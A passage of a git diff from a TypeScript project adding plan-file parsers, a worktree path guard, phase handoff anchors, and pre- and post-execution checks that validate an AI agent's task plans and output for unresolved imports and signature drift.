+
+      // Use indexOf-based parsing instead of [\s\S]*? regex to avoid
+      // catastrophic backtracking on content with code fences (#468).
+      const prodIdx = sectionContent.search(/^Produces:\s*$/m);
+      if (prodIdx !== -1) {
+        const afterProd = sectionContent.indexOf('\n', prodIdx);
+        if (afterProd !== -1) {
+          const consIdx = sectionContent.search(/^Consumes/m);
+          const endIdx = consIdx !== -1 && consIdx > afterProd ? consIdx : sectionContent.length;
+          produces = sectionContent.slice(afterProd + 1, endIdx).trim();
+        }
+      }
+
+      const consLineMatch = sectionContent.match(/^Consumes[^:]*:\s*(.+)$/m);
+      if (consLineMatch) {
+        consumes = consLineMatch[1].trim();
+      }
+      if (!consumes) {
+        const consIdx = sectionContent.search(/^Consumes[^:]*:\s*$/m);
+        if (consIdx !== -1) {
+          const afterCons = sectionContent.indexOf('\n', consIdx);
+          if (afterCons !== -1) {
+            consumes = sectionContent.slice(afterCons + 1).trim();
+          }
+        }
+      }
+
+      boundaryMap.push({ fromSlice, toSlice, produces, consumes });
+    }
+  }
+
+  const result = { title, vision, successCriteria, slices, boundaryMap };
+  stopTimer({ native: false, slices: slices.length, boundaryEntries: boundaryMap.length });
+  debugCount("parseRoadmapCalls");
+  return result;
+}
+
+// ─── Slice Plan Parser ─────────────────────────────────────────────────────
+
+export function parsePlan(content: string): SlicePlan {
+  return cachedParse(content, 'plan', _parsePlanImpl);
+}
+
+function _parsePlanImpl(content: string): SlicePlan {
+  const stopTimer = debugTime("parse-plan");
+  const [, body] = splitFrontmatter(content);
+  // Try native parser first for better performance
+  const nativeResult = nativeParsePlanFile(body);
+  if (nativeResult) {
+    stopTimer({ native: true });
+    return {
+      id: nativeResult.id,
+      title: nativeResult.title,
+      goal: nativeResult.goal,
+      demo: nativeResult.demo,
+      mustHaves: nativeResult.mustHaves,
+      tasks: nativeResult.tasks.map(t => ({
+        id: t.id,
+        title: t.title,
+        description: t.description,
+        done: t.done,
+        estimate: t.estimate,
+        ...(t.files.length > 0 ? { files: t.files } : {}),
+        ...(t.verify ? { verify: t.verify } : {}),
+      })),
+      filesLikelyTouched: nativeResult.filesLikelyTouched,
+    };
+  }
+
+  const lines = body.split('\n');
+
+  const h1 = lines.find(l => l.startsWith('# '));
+  let id = '';
+  let title = '';
+  if (h1) {
+    const match = h1.match(/^#\s+(\w+):\s+(.+)/);
+    if (match) {
+      id = match[1];
+      title = match[2].trim();
+    } else {
+      title = h1.slice(2).trim();
+    }
+  }
+
+  const goal = extractBoldField(body, 'Goal') || '';
+  const demo = extractBoldField(body, 'Demo') || '';
+
+  const mhSection = extractSection(body, 'Must-Haves');
+  const mustHaves = mhSection ? parseBullets(mhSection) : [];
+
+  // Parse tasks from ## Tasks section first, then scan the full body for any
+  // task checkboxes that were missed. Multi-task plans can interleave T01 detail
+  // headings (## Steps, ## Must-Haves) before T02's checkbox, which causes
+  // extractSection("Tasks") to stop at the first ## heading and miss T02+ (#3105).
+  const tasksSection = extractSection(body, 'Tasks');
+  const tasks: TaskPlanEntry[] = [];
+
+  // Parse task entries from a set of lines, appending to `tasks`.
+  const parseTaskLines = (lines: string[], knownIds: Set<string>): void => {
+    let currentTask: TaskPlanEntry | null = null;
+
+    for (const line of lines) {
+      const cbMatch = line.match(/^-\s+\[([ xX])\]\s+\*\*([\w.]+):\s+(.+?)\*\*\s*(.*)/);
+      // Heading-style: ### T01 -- Title, ### T01: Title, ### T01 — Title
+      const hdMatch = !cbMatch
+        ? line.match(/^#{2,4}\s+([A-Z]+\d+(?:\.[A-Z]+\d+)*)\s*(?:--|—|:)\s*(.+)/)
+        : null;
+      if (cbMatch || hdMatch) {
+        const taskId = cbMatch ? cbMatch[2] : hdMatch![1];
+        // Skip tasks already found in the Tasks section
+        if (knownIds.has(taskId)) {
+          currentTask = null;
+          continue;
+        }
+        if (currentTask) tasks.push(currentTask);
+
+        if (cbMatch) {
+          const rest = cbMatch[4] || '';
+          const estMatch = rest.match(/`est:([^`]+)`/);
+          const estimate = estMatch ? estMatch[1] : '';
+
+          currentTask = {
+            id: cbMatch[2],
+            title: cbMatch[3],
+            description: '',
+            done: cbMatch[1].toLowerCase() === 'x',
+            estimate,
+          };
+        } else {
+          const rest = hdMatch![2] || '';
+          const titleEstMatch = rest.match(/^(.+?)\s*`est:([^`]+)`\s*$/);
+          const title = titleEstMatch ? titleEstMatch[1].trim() : rest.trim();
+          const estimate = titleEstMatch ? titleEstMatch[2] : '';
+
+          currentTask = {
+            id: hdMatch![1],
+            title,
+            description: '',
+            done: false,
+            estimate,
+          };
+        }
+      } else if (currentTask && line.match(/^\s*-\s+Files:\s*(.*)/)) {
+        const filesMatch = line.match(/^\s*-\s+Files:\s*(.*)/);
+        if (filesMatch) {
+          currentTask.files = filesMatch[1]
+            .split(',')
+            .map(f => f.replace(/`/g, '').trim())
+            .filter(f => f.length > 0);
+        }
+      } else if (currentTask && line.match(/^\s*-\s+Verify:\s*(.*)/)) {
+        const verifyMatch = line.match(/^\s*-\s+Verify:\s*(.*)/);
+        if (verifyMatch) {
+          currentTask.verify = verifyMatch[1].trim();
+        }
+      } else if (currentTask && line.trim() && !line.startsWith('#')) {
+        const desc = line.trim();
+        if (desc) {
+          currentTask.description = currentTask.description
+            ? currentTask.description + ' ' + desc
+            : desc;
+        }
+      }
+    }
+    if (currentTask) tasks.push(currentTask);
+  };
+
+  if (tasksSection) {
+    parseTaskLines(tasksSection.split('\n'), new Set());
+  }
+
+  // Second pass: scan the full body for task checkboxes outside ## Tasks.
+  // This handles interleaved plans where T02+ appear after T01's detail headings.
+  const foundIds = new Set(tasks.map(t => t.id));
+  parseTaskLines(body.split('\n'), foundIds);
+
+  const filesSection = extractSection(body, 'Files Likely Touched');
+  const filesLikelyTouched = filesSection ? parseBullets(filesSection) : [];
+
+  const result = { id, title, goal, demo, mustHaves, tasks, filesLikelyTouched };
+  stopTimer({ tasks: tasks.length });
+  debugCount("parsePlanCalls");
+  return result;
+}
diff --git a/src/resources/extensions/gsd/paths.ts b/src/resources/extensions/gsd/paths.ts
index ccd3c59f6..8beaefdaa 100644
--- a/src/resources/extensions/gsd/paths.ts
+++ b/src/resources/extensions/gsd/paths.ts
@@ -264,6 +264,7 @@ export const GSD_ROOT_FILES = {
   REQUIREMENTS: "REQUIREMENTS.md",
   OVERRIDES: "OVERRIDES.md",
   KNOWLEDGE: "KNOWLEDGE.md",
+  CODEBASE: "CODEBASE.md",
 } as const;
 
 export type GSDRootFileKey = keyof typeof GSD_ROOT_FILES;
@@ -276,6 +277,7 @@ const LEGACY_GSD_ROOT_FILES: Record<GSDRootFileKey, string> = {
   REQUIREMENTS: "requirements.md",
   OVERRIDES: "overrides.md",
   KNOWLEDGE: "knowledge.md",
+  CODEBASE: "codebase.md",
 };
 
 // ─── GSD Root Discovery ───────────────────────────────────────────────────────
@@ -307,16 +309,58 @@ export function gsdRoot(basePath: string): string {
   return result;
 }
 
+/**
+ * Detect if a path is inside a .gsd/worktrees/<name>/ structure.
+ *
+ * GSD auto-worktrees live at <project>/.gsd/worktrees/<milestoneId>/.
+ * When gsdRoot() is called with such a path, we must NOT walk up to the
+ * project root's .gsd — each worktree manages its own .gsd state (#2594).
+ *
+ * Matches both forward-slash and platform-native separators to handle
+ * Windows paths (path.sep = '\\') and normalized Unix paths.
+ */
+function isInsideGsdWorktree(p: string): boolean {
+  // Match /.gsd/worktrees/<name> where <name> is the final segment or
+  // followed by a separator. The <name> segment must be non-empty.
+  const sepFwd = "/";
+  const sepNative = "\\";
+  const markers = [
+    `${sepFwd}.gsd${sepFwd}worktrees${sepFwd}`,
+    `${sepNative}.gsd${sepNative}worktrees${sepNative}`,
+  ];
+  for (const marker of markers) {
+    const idx = p.indexOf(marker);
+    if (idx === -1) continue;
+    // Verify there's a non-empty worktree name after the marker
+    const afterMarker = p.slice(idx + marker.length);
+    // The name is everything up to the next separator (or end of string)
+    const nameEnd = afterMarker.search(/[/\\]/);
+    const name = nameEnd === -1 ? afterMarker : afterMarker.slice(0, nameEnd);
+    if (name.length > 0) return true;
+  }
+  return false;
+}
+
 function probeGsdRoot(rawBasePath: string): string {
   // 1. Fast path — check the input path directly
   const local = join(rawBasePath, ".gsd");
   if (existsSync(local)) return local;
 
+  // 1b. Worktree guard (#2594) — if basePath is inside a .gsd/worktrees/<name>/
+  //     structure, return the worktree-local .gsd path immediately. Without this,
+  //     the git-root probe (step 2) or walk-up (step 3) escapes to the project
+  //     root's .gsd, causing ensurePreconditions() and deriveState() to read/write
+  //     state in the wrong location.
+  if (isInsideGsdWorktree(rawBasePath)) return local;
+
   // Resolve symlinks so path comparisons work correctly across platforms
   // (e.g. macOS /var → /private/var). Use rawBasePath as fallback if not resolvable.
   let basePath: string;
   try { basePath = realpathSync.native(rawBasePath); } catch { basePath = rawBasePath; }
 
+  // Also check the resolved path for the worktree pattern (macOS /tmp → /private/tmp)
+  if (basePath !== rawBasePath && isInsideGsdWorktree(basePath)) return local;
+
   // 2. Git root anchor — used as both probe target and walk-up boundary
   //    Only walk if we're inside a git project — prevents escaping into
   //    unrelated filesystem territory when running outside any repo.
diff --git a/src/resources/extensions/gsd/phase-anchor.ts b/src/resources/extensions/gsd/phase-anchor.ts
new file mode 100644
index 000000000..16f1df5e1
--- /dev/null
+++ b/src/resources/extensions/gsd/phase-anchor.ts
@@ -0,0 +1,71 @@
+/**
+ * Phase handoff anchors — compact structured summaries written between
+ * GSD auto-mode phases so downstream agents inherit decisions, blockers,
+ * and intent without re-inferring from scratch.
+ */
+
+import { existsSync, mkdirSync, readFileSync, writeFileSync } from "node:fs";
+import { join } from "node:path";
+import { gsdRoot } from "./paths.js";
+
+export interface PhaseAnchor {
+  phase: string;
+  milestoneId: string;
+  generatedAt: string;
+  intent: string;
+  decisions: string[];
+  blockers: string[];
+  nextSteps: string[];
+}
+
+function anchorsDir(basePath: string, milestoneId: string): string {
+  return join(gsdRoot(basePath), "milestones", milestoneId, "anchors");
+}
+
+function anchorPath(basePath: string, milestoneId: string, phase: string): string {
+  return join(anchorsDir(basePath, milestoneId), `${phase}.json`);
+}
+
+export function writePhaseAnchor(basePath: string, milestoneId: string, anchor: PhaseAnchor): void {
+  const dir = anchorsDir(basePath, milestoneId);
+  if (!existsSync(dir)) {
+    mkdirSync(dir, { recursive: true });
+  }
+  writeFileSync(anchorPath(basePath, milestoneId, anchor.phase), JSON.stringify(anchor, null, 2), "utf-8");
+}
+
+export function readPhaseAnchor(basePath: string, milestoneId: string, phase: string): PhaseAnchor | null {
+  const path = anchorPath(basePath, milestoneId, phase);
+  if (!existsSync(path)) return null;
+  try {
+    return JSON.parse(readFileSync(path, "utf-8")) as PhaseAnchor;
+  } catch {
+    return null;
+  }
+}
+
+export function formatAnchorForPrompt(anchor: PhaseAnchor): string {
+  const lines: string[] = [
+    `## Handoff from ${anchor.phase}`,
+    "",
+    `**Intent:** ${anchor.intent}`,
+  ];
+
+  if (anchor.decisions.length > 0) {
+    lines.push("", "**Decisions:**");
+    for (const d of anchor.decisions) lines.push(`- ${d}`);
+  }
+
+  if (anchor.blockers.length > 0) {
+    lines.push("", "**Blockers:**");
+    for (const b of anchor.blockers) lines.push(`- ${b}`);
+  }
+
+  if (anchor.nextSteps.length > 0) {
+    lines.push("", "**Next steps:**");
+    for (const s of anchor.nextSteps) lines.push(`- ${s}`);
+  }
+
+  lines.push("", "---");
+  return lines.join("\n");
+}
diff --git a/src/resources/extensions/gsd/post-execution-checks.ts b/src/resources/extensions/gsd/post-execution-checks.ts
new file mode 100644
index 000000000..284c803c0
--- /dev/null
+++ b/src/resources/extensions/gsd/post-execution-checks.ts
@@ -0,0 +1,539 @@
+/**
+ * Post-Execution Checks — Validate task output after execution completes.
+ *
+ * Runs these checks against a completed task's output:
+ *   1. Import resolution — verify relative imports in key_files resolve to existing files
+ *   2. Cross-task signatures — detect hallucination cascades (function exists in task output
+ *      but doesn't match prior tasks' actual code)
+ *   3. Pattern consistency — warn on async style drift, naming convention inconsistencies
+ *
+ * Design principles:
+ *   - Pure functions taking (taskRow, priorTasks, basePath) for testability
+ *   - Import checks are blocking failures; pattern checks are warnings
+ *   - No AST parsers — uses regex heuristics
+ */
+
+import { existsSync, readFileSync } from "node:fs";
+import { resolve, dirname, join, extname } from "node:path";
+import type { TaskRow } from "./gsd-db.ts";
+
+// ─── Result Types ────────────────────────────────────────────────────────────
+
+export interface PostExecutionCheckJSON {
+  /** Check category: import, signature, pattern */
+  category: "import" | "signature" | "pattern";
+  /** What was checked (e.g., file path, function name) */
+  target: string;
+  /** Whether the check passed */
+  passed: boolean;
+  /** Human-readable message explaining the result */
+  message: string;
+  /** Whether this failure should block completion (only meaningful when passed=false) */
+  blocking?: boolean;
+}
+
+export interface PostExecutionResult {
+  /** Overall result: pass if no blocking failures, warn if non-blocking issues, fail if blocking issues */
+  status: "pass" | "warn" | "fail";
+  /** All check results */
+  checks: PostExecutionCheckJSON[];
+  /** Total duration in milliseconds */
+  durationMs: number;
+}
+
+// ─── Import Resolution Check ─────────────────────────────────────────────────
+
+/**
+ * Extract relative import paths from TypeScript/JavaScript source code.
+ * Returns array of { importPath, lineNum } for relative imports.
+ */
+export function extractRelativeImports(
+  source: string
+): Array<{ importPath: string; lineNum: number }> {
+  const imports: Array<{ importPath: string; lineNum: number }> = [];
+  const lines = source.split("\n");
+
+  // Match:
+  //   import ... from './path'
+  //   import ... from "../path"
+  //   import './path'
+  //   require('./path')
+  //   require("../path")
+  const importPattern = /(?:import\s+(?:.*?\s+from\s+)?|require\s*\(\s*)(['"])(\.\.?\/[^'"]+)\1/g;
+
+  // Track if we're inside a block comment
+  let inBlockComment = false;
+
+  for (let i = 0; i < lines.length; i++) {
+    const line = lines[i];
+
+    // Handle block comment boundaries
+    if (inBlockComment) {
+      if (line.includes("*/")) {
+        inBlockComment = false;
+      }
+      continue;
+    }
+
+    // Check for block comment start (that doesn't end on same line)
+    const blockStart = line.indexOf("/*");
+    const blockEnd = line.indexOf("*/");
+    if (blockStart !== -1 && (blockEnd === -1 || blockEnd < blockStart)) {
+      inBlockComment = true;
+      continue;
+    }
+
+    // Skip single-line comments (// at start or after whitespace)
+    const trimmed = line.trimStart();
+    if (trimmed.startsWith("//")) {
+      continue;
+    }
+
+    // Skip JSDoc-style lines (e.g., " * import ...")
+    if (trimmed.startsWith("*")) {
+      continue;
+    }
+
+    let match: RegExpExecArray | null;
+
+    // Reset lastIndex for each line
+    importPattern.lastIndex = 0;
+
+    while ((match = importPattern.exec(line)) !== null) {
+      // Check if this match is after a // comment marker on the same line
+      const beforeMatch = line.substring(0, match.index);
+      if (beforeMatch.includes("//")) {
+        continue;
+      }
+
+      imports.push({
+        importPath: match[2],
+        lineNum: i + 1,
+      });
+    }
+  }
+
+  return imports;
+}
+
+/**
+ * Check if a relative import resolves to an existing file.
+ * Handles .ts, .tsx, .js, .jsx extensions and index files.
+ * Also handles TypeScript ESM convention where imports use .js but resolve to .ts.
+ */
+export function resolveImportPath(
+  importPath: string,
+  sourceFile: string,
+  basePath: string
+): { exists: boolean; resolvedPath: string | null } {
+  const sourceDir = dirname(resolve(basePath, sourceFile));
+  const extensions = [".ts", ".tsx", ".js", ".jsx", ".mjs", ".cjs"];
+
+  // Handle TypeScript ESM convention: .js imports resolve to .ts files
+  // e.g., import './types.js' -> ./types.ts
+  let normalizedPath = importPath;
+  if (importPath.endsWith(".js")) {
+    normalizedPath = importPath.slice(0, -3);
+  } else if (importPath.endsWith(".jsx")) {
+    normalizedPath = importPath.slice(0, -4);
+  } else if (importPath.endsWith(".mjs")) {
+    normalizedPath = importPath.slice(0, -4);
+  } else if (importPath.endsWith(".cjs")) {
+    normalizedPath = importPath.slice(0, -4);
+  }
+
+  // Try the normalized path with common extensions first
+  for (const ext of extensions) {
+    const fullPath = resolve(sourceDir, normalizedPath + ext);
+    if (existsSync(fullPath)) {
+      return { exists: true, resolvedPath: fullPath };
+    }
+  }
+
+  // Try as a directory with index file
+  for (const ext of extensions) {
+    const indexPath = resolve(sourceDir, normalizedPath, `index${ext}`);
+    if (existsSync(indexPath)) {
+      return { exists: true, resolvedPath: indexPath };
+    }
+  }
+
+  // Check if path already has extension (for .json, etc.)
+  const hasExt = [".ts", ".tsx", ".js", ".jsx", ".mjs", ".cjs", ".json"].some(
+    (ext) => importPath.endsWith(ext)
+  );
+  if (hasExt) {
+    const fullPath = resolve(sourceDir, importPath);
+    if (existsSync(fullPath)) {
+      return { exists: true, resolvedPath: fullPath };
+    }
+  }
+
+  return { exists: false, resolvedPath: null };
+}
+
+/**
+ * Check that all relative imports in the task's key_files resolve to existing files.
+ * Reads modified files from task.key_files, extracts import statements via regex,
+ * verifies relative imports resolve to existing files.
+ */
+export function checkImportResolution(
+  taskRow: TaskRow,
+  _priorTasks: TaskRow[],
+  basePath: string
+): PostExecutionCheckJSON[] {
+  const results: PostExecutionCheckJSON[] = [];
+
+  // Get files from key_files
+  const filesToCheck = taskRow.key_files.filter((f) => {
+    const ext = extname(f);
+    return [".ts", ".tsx", ".js", ".jsx", ".mjs", ".cjs"].includes(ext);
+  });
+
+  for (const file of filesToCheck) {
+    const absolutePath = resolve(basePath, file);
+
+    // Skip if file doesn't exist (might have been deleted or renamed)
+    if (!existsSync(absolutePath)) {
+      continue;
+    }
+
+    let source: string;
+    try {
+      source = readFileSync(absolutePath, "utf-8");
+    } catch {
+      continue;
+    }
+
+    const imports = extractRelativeImports(source);
+
+    for (const { importPath, lineNum } of imports) {
+      const resolution = resolveImportPath(importPath, file, basePath);
+
+      if (!resolution.exists) {
+        results.push({
+          category: "import",
+          target: `${file}:${lineNum}`,
+          passed: false,
+          message: `Import '${importPath}' in ${file}:${lineNum} does not resolve to an existing file`,
+          blocking: true,
+        });
+      }
+    }
+  }
+
+  return results;
+}
+
+// ─── Cross-Task Signature Check ──────────────────────────────────────────────
+
+interface FunctionSignature {
+  name: string;
+  params: string;
+  returnType: string;
+  file: string;
+  lineNum: number;
+}
+
+/**
+ * Extract function signatures from TypeScript/JavaScript source code.
+ */
+function extractFunctionSignatures(
+  source: string,
+  fileName: string
+): FunctionSignature[] {
+  const signatures: FunctionSignature[] = [];
+  const lines = source.split("\n");
+
+  // Match function declarations and exports
+  // Patterns:
+  //   function name(params): ReturnType
+  //   export function name(params): ReturnType
+  //   export async function name(params): Promise<ReturnType>
+  //   const name = (params): ReturnType =>
+  //   export const name = (params): ReturnType =>
+  const funcPattern =
+    /(?:export\s+)?(?:async\s+)?(?:function\s+|const\s+)(\w+)(?:\s*=\s*)?\s*\(([^)]*)\)(?:\s*:\s*([^{=>\n]+))?/g;
+
+  for (let i = 0; i < lines.length; i++) {
+    const line = lines[i];
+    funcPattern.lastIndex = 0;
+
+    let match: RegExpExecArray | null;
+    while ((match = funcPattern.exec(line)) !== null) {
+      const [, name, params, returnType] = match;
+      signatures.push({
+        name,
+        params: normalizeParams(params),
+        returnType: normalizeType(returnType || "void"),
+        file: fileName,
+        lineNum: i + 1,
+      });
+    }
+  }
+
+  return signatures;
+}
+
+/**
+ * Normalize parameter list for comparison.
+ */
+function normalizeParams(params: string): string {
+  return params
+    .replace(/\/\*[\s\S]*?\*\//g, "") // Remove block comments
+    .replace(/\/\/[^\n]*/g, "") // Remove line comments
+    .replace(/\s*=\s*[^,)]+/g, "") // Remove default values
+    .replace(/\s+/g, " ") // Normalize whitespace
+    .trim();
+}
+
+/**
+ * Normalize type for comparison.
+ */
+function normalizeType(type: string): string {
+  return type.replace(/\s+/g, " ").trim();
+}
+
+/**
+ * Compare function signatures in current task's output against prior tasks' key_files
+ * to catch hallucination cascades — when a task references functions that don't exist
+ * or have different signatures than what was actually created.
+ */
+export function checkCrossTaskSignatures(
+  taskRow: TaskRow,
+  priorTasks: TaskRow[],
+  basePath: string
+): PostExecutionCheckJSON[] {
+  const results: PostExecutionCheckJSON[] = [];
+
+  // Build map of functions from prior tasks' key_files
+  const priorSignatures = new Map<string, FunctionSignature[]>();
+
+  for (const task of priorTasks) {
+    for (const file of task.key_files) {
+      const ext = extname(file);
+      if (![".ts", ".tsx", ".js", ".jsx", ".mjs", ".cjs"].includes(ext)) continue;
+
+      const absolutePath = resolve(basePath, file);
+      if (!existsSync(absolutePath)) continue;
+
+      try {
+        const source = readFileSync(absolutePath, "utf-8");
+        const sigs = extractFunctionSignatures(source, file);
+        for (const sig of sigs) {
+          const existing = priorSignatures.get(sig.name) || [];
+          existing.push(sig);
+          priorSignatures.set(sig.name, existing);
+        }
+      } catch {
+        // Skip unreadable files
+      }
+    }
+  }
+
+  // Extract function calls/references from current task's key_files
+  // and check they match prior definitions
+  for (const file of taskRow.key_files) {
+    const ext = extname(file);
+    if (![".ts", ".tsx", ".js", ".jsx", ".mjs", ".cjs"].includes(ext)) continue;
+
+    const absolutePath = resolve(basePath, file);
+    if (!existsSync(absolutePath)) continue;
+
+    try {
+      const source = readFileSync(absolutePath, "utf-8");
+      const currentSigs = extractFunctionSignatures(source, file);
+
+      // Check each function in current task against prior definitions
+      for (const currentSig of currentSigs) {
+        const priorDefs = priorSignatures.get(currentSig.name);
+
+        // If this function was defined in a prior task, check for signature drift
+        if (priorDefs && priorDefs.length > 0) {
+          const priorDef = priorDefs[0]; // Use first definition
+
+          // Check parameter mismatch
+          if (currentSig.params !== priorDef.params) {
+            results.push({
+              category: "signature",
+              target: currentSig.name,
+              passed: false,
+              message: `Function '${currentSig.name}' in ${file}:${currentSig.lineNum} has parameters '${currentSig.params}' but prior definition in ${priorDef.file}:${priorDef.lineNum} has '${priorDef.params}'`,
+              blocking: false, // Warn only — may be intentional override
+            });
+          }
+
+          // Check return type mismatch
+          if (currentSig.returnType !== priorDef.returnType) {
+            results.push({
+              category: "signature",
+              target: currentSig.name,
+              passed: false,
+              message: `Function '${currentSig.name}' in ${file}:${currentSig.lineNum} returns '${currentSig.returnType}' but prior definition in ${priorDef.file}:${priorDef.lineNum} returns '${priorDef.returnType}'`,
+              blocking: false, // Warn only — may be intentional override
+            });
+          }
+        }
+      }
+    } catch {
+      // Skip unreadable files
+    }
+  }
+
+  return results;
+}
+
+// ─── Pattern Consistency Check ───────────────────────────────────────────────
+
+/**
+ * Detect async style drift (mixing async/await with .then()) and
+ * naming convention inconsistencies within a task's key_files.
+ * Warn only — these are style issues, not correctness issues.
+ */
+export function checkPatternConsistency(
+  taskRow: TaskRow,
+  _priorTasks: TaskRow[],
+  basePath: string
+): PostExecutionCheckJSON[] {
+  const results: PostExecutionCheckJSON[] = [];
+
+  for (const file of taskRow.key_files) {
+    const ext = extname(file);
+    if (![".ts", ".tsx", ".js", ".jsx", ".mjs", ".cjs"].includes(ext)) continue;
+
+    const absolutePath = resolve(basePath, file);
+    if (!existsSync(absolutePath)) continue;
+
+    try {
+      const source = readFileSync(absolutePath, "utf-8");
+
+      // Check for async style drift
+      const asyncStyleResult = checkAsyncStyleDrift(source, file);
+      if (asyncStyleResult) {
+        results.push(asyncStyleResult);
+      }
+
+      // Check for naming convention inconsistencies
+      const namingResults = checkNamingConsistency(source, file);
+      results.push(...namingResults);
+    } catch {
+      // Skip unreadable files
+    }
+  }
+
+  return results;
+}
+
+/**
+ * Detect async style drift within a single file.
+ * Returns a warning if both async/await AND .then() promise chaining are used.
+ */
+function checkAsyncStyleDrift(
+  source: string,
+  fileName: string
+): PostExecutionCheckJSON | null {
+  // Check for async/await usage
+  const hasAsyncAwait = /\basync\b[\s\S]*?\bawait\b/.test(source);
+
+  // Check for .then() promise chaining (excluding comments)
+  // Filter out common false positives like Array.prototype.then doesn't exist
+  const hasThenChaining = /\.\s*then\s*\(/.test(source);
+
+  // If both patterns are present, flag as style drift
+  if (hasAsyncAwait && hasThenChaining) {
+    return {
+      category: "pattern",
+      target: fileName,
+      passed: true, // Warning only
+      message: `File ${fileName} mixes async/await with .then() promise chaining — consider using consistent async style`,
+      blocking: false,
+    };
+  }
+
+  return null;
+}
+
+/**
+ * Check for naming convention inconsistencies within a file.
+ * Detects mixing of camelCase and snake_case for similar identifier types.
+ */
+function checkNamingConsistency(
+  source: string,
+  fileName: string
+): PostExecutionCheckJSON[] {
+  const results: PostExecutionCheckJSON[] = [];
+
+  // Extract function names
+  const functionNames: string[] = [];
+  const funcPattern = /(?:function\s+|const\s+|let\s+|var\s+)(\w+)(?:\s*=\s*(?:async\s*)?\(|\s*\()/g;
+  let match: RegExpExecArray | null;
+
+  while ((match = funcPattern.exec(source)) !== null) {
+    functionNames.push(match[1]);
+  }
+
+  // Check for mixed naming conventions in functions
+  const camelCaseFuncs = functionNames.filter((n) => /^[a-z][a-zA-Z0-9]*$/.test(n) && /[A-Z]/.test(n));
+  const snakeCaseFuncs = functionNames.filter((n) => /^[a-z][a-z0-9]*(_[a-z0-9]+)+$/.test(n));
+
+  if (camelCaseFuncs.length > 0 && snakeCaseFuncs.length > 0) {
+    results.push({
+      category: "pattern",
+      target: fileName,
+      passed: true, // Warning only
+      message: `File ${fileName} mixes camelCase (${camelCaseFuncs.slice(0, 2).join(", ")}) and snake_case (${snakeCaseFuncs.slice(0, 2).join(", ")}) function names`,
+      blocking: false,
+    });
+  }
+
+  return results;
+}
+
+// ─── Main Entry Point ────────────────────────────────────────────────────────
+
+/**
+ * Run all post-execution checks against a completed task.
+ *
+ * @param taskRow - The completed task row
+ * @param priorTasks - Array of TaskRow from prior completed tasks in the slice
+ * @param basePath - Base path for resolving file references
+ * @returns PostExecutionResult with status, checks, and duration
+ */
+export function runPostExecutionChecks(
+  taskRow: TaskRow,
+  priorTasks: TaskRow[],
+  basePath: string
+): PostExecutionResult {
+  const startTime = Date.now();
+  const allChecks: PostExecutionCheckJSON[] = [];
+
+  // Run all checks
+  const importChecks = checkImportResolution(taskRow, priorTasks, basePath);
+  const signatureChecks = checkCrossTaskSignatures(taskRow, priorTasks, basePath);
+  const patternChecks = checkPatternConsistency(taskRow, priorTasks, basePath);
+
+  allChecks.push(...importChecks, ...signatureChecks, ...patternChecks);
+
+  const durationMs = Date.now() - startTime;
+
+  // Determine overall status
+  const hasBlockingFailure = allChecks.some((c) => !c.passed && c.blocking);
+  const hasNonBlockingIssue = allChecks.some(
+    (c) => (!c.passed && !c.blocking) || (c.passed && c.category === "pattern")
+  );
+
+  let status: "pass" | "warn" | "fail";
+  if (hasBlockingFailure) {
+    status = "fail";
+  } else if (hasNonBlockingIssue) {
+    status = "warn";
+  } else {
+    status = "pass";
+  }
+
+  return {
+    status,
+    checks: allChecks,
+    durationMs,
+  };
+}
diff --git a/src/resources/extensions/gsd/pre-execution-checks.ts b/src/resources/extensions/gsd/pre-execution-checks.ts
new file mode 100644
index 000000000..ed10ba50b
--- /dev/null
+++ b/src/resources/extensions/gsd/pre-execution-checks.ts
@@ -0,0 +1,598 @@
+/**
+ * Pre-Execution Checks — Validate task plans before execution begins.
+ *
+ * Runs these checks against a slice's task plan:
+ *   1. Package existence — npm view calls in parallel with timeout
+ *   2. File path consistency — verify files exist or are in prior expected_output
+ *   3. Task ordering — detect impossible ordering (task reads file created later)
+ *   4. Interface contracts — detect contradictory function signatures (warn only)
+ *
+ * Design principles:
+ *   - Pure functions taking (tasks: TaskRow[], basePath: string) for testability
+ *   - Network failures warn, don't fail (R012 conservative design)
+ *   - Total execution <2s target (R013)
+ *   - No AST parsers — interface parsing is heuristic (regex on code blocks)
+ */
+
+import { existsSync } from "node:fs";
+import { spawn } from "node:child_process";
+import { resolve } from "node:path";
+import type { TaskRow } from "./gsd-db.ts";
+import type { PreExecutionCheckJSON } from "./verification-evidence.ts";
+
+// ─── Result Types ────────────────────────────────────────────────────────────
+
+export interface PreExecutionResult {
+  /** Overall result: pass if no blocking failures, warn if non-blocking issues, fail if blocking issues */
+  status: "pass" | "warn" | "fail";
+  /** All check results */
+  checks: PreExecutionCheckJSON[];
+  /** Total duration in milliseconds */
+  durationMs: number;
+}
+
+// ─── Package Existence Check ─────────────────────────────────────────────────
+
+/**
+ * Extract npm package names from task descriptions.
+ * Looks for:
+ *   - `npm install <pkg>` patterns
+ *   - Code blocks with `require('<pkg>')` or `import ... from '<pkg>'`
+ *   - Explicit mentions like "uses lodash" or "package: axios"
+ */
+export function extractPackageReferences(description: string): string[] {
+  const packages = new Set<string>();
+
+  // Common words that aren't package names but might appear after install
+  const stopwords = new Set([
+    "then", "and", "the", "to", "a", "an", "in", "for", "with", "from", "or",
+    "npm", "yarn", "pnpm", "i", // Don't capture the command itself
+  ]);
+
+  // npm install <pkg> patterns (handles npm i, npm add, yarn add, pnpm add)
+  // Use a global pattern to find all install commands, then parse following tokens
+  const installCmdPattern = /(?:npm\s+(?:install|i|add)|yarn\s+add|pnpm\s+add)\s+/g;
+  let cmdMatch: RegExpExecArray | null;
+  
+  while ((cmdMatch = installCmdPattern.exec(description)) !== null) {
+    // Start after the install command
+    const afterCmd = description.slice(cmdMatch.index + cmdMatch[0].length);
+    
+    // Match package-like tokens (alphanumeric, @, /, -, _) until we hit
+    // something that's not a package (non-token char after whitespace)
+    const tokenPattern = /^([@a-zA-Z][a-zA-Z0-9@/_-]*)(?:\s+|$)/;
+    let remaining = afterCmd;
+    
+    while (remaining.length > 0) {
+      // Skip any flags like -D, --save-dev
+      const flagMatch = remaining.match(/^(-[a-zA-Z-]+)\s*/);
+      if (flagMatch) {
+        remaining = remaining.slice(flagMatch[0].length);
+        continue;
+      }
+      
+      // Try to match a package name
+      const pkgMatch = remaining.match(tokenPattern);
+      if (pkgMatch) {
+        const token = pkgMatch[1];
+        // Skip stopwords - they indicate end of package list
+        if (stopwords.has(token.toLowerCase())) {
+          break;
+        }
+        packages.add(normalizePackageName(token));
+        remaining = remaining.slice(pkgMatch[0].length);
+      } else {
+        // Not a package name, stop parsing this install command
+        break;
+      }
+    }
+  }
+
